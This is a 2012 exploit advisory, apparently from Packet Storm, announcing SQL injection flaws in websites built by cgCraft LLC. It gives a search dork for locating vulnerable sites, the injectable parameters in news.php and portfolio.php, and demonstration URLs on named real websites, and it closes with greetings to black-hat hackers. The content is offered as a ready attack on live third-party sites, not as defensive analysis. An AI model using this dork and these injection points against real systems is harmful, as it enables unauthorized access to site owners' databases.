Sites designed by cgCraft LLC suffers from multiple remote SQL injection vulnerabilities. Note that this finding houses site-specific data.
96bd7ce98834913b9501e149372ef2a2ea2421a1b4b96ccfd3a08f0011631f6a
################################################################
----------------------------------------------------------------
cgCraft llc SQL Injection Vulnerability
----------------------------------------------------------------
################################################################
# Exploit Title : cgCraft llc SQL Injection Vulnerability
# Author : Hack Center Security Team
# Discovered By : Net.W0lf
# Software Link : [ www.cgcraft.com ]
# My Site : Net-w0lf.blogspot.com
# Date : 9/20/2012
# E-Mail : Bl4ck.intell@gmail.com & Net-W0lf@att.net
# D0rK : intext:" website by cgCraft llc "
################################################################
----------------------------------------------------------------
+-----------------------+
| SQL Injection |
+-----------------------+
Expl0!T :
[TaRgeT]/news.php?department_id=[SQl]
&
[TaRgeT]/portfolio.php?s=[SQl]
D3m0:
www.boomergolfnews.com/news.php?department_id=21'
www.cgcraft.com/portfolio.php?s='
GreetZ To :
| Am!r | B3HZ4D | Packetstormsecurity.org | Exploit-db.com |
| And All Iranian Black Hat HackerZ |
===========================================# End #=============================================